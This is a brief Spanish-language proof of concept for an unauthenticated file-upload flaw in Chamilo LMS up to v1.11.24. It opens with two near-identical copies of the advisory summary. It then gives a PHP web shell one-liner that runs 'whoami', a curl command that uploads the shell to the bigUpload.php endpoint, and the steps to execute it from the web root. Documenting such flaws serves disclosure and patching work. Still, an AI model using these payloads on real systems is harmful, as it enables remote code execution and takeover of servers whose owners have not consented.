
Carga de archivos sin restricciones en la funcionalidad de carga de archivos grandes en `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` en Chamilo LMS <= v1.11.24 permite a atacantes no autenticados realizar ataques de cross-site scripting almacenados y obtener ejecución remota de código mediante la subida de una web shell.
Carga de archivos sin restricciones en la funcionalidad de carga de archivos grandes en /main/inc/lib/javascript/bigupload/inc/bigUpload.php en Chamilo LMS <= v1.11.24 permite a atacantes no autenticados realizar ataques de cross-site scripting almacenado y obtener ejecución remota de código mediante la carga de una web shell.
La funcionalidad de carga de archivos grandes mediante /main/inc/lib/javascript/bigupload/inc/bigUpload.php permite cargar archivos arbitrarios al directorio /main/inc/lib/javascript/bigupload/files dentro de la raíz web.
Si el directorio /main/inc/lib/javascript/bigupload/files existe, podemos cargar un archivo arbitrario como;
Crear un archivo php malicioso echo '<?php system("whoami"); ?>' > dollarboysushil.php
.png)
Luego podemos cargar este archivo ejecutando el siguiente comando
`$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'`
.png)
Podemos verificar que nuestro archivo fue cargado visitando el directorio /main/inc/lib/javascript/bigupload/files
.png)
Y podemos ejecutarlo haciendo clic en el archivo php, lo que da la salida del comando whoami
.png)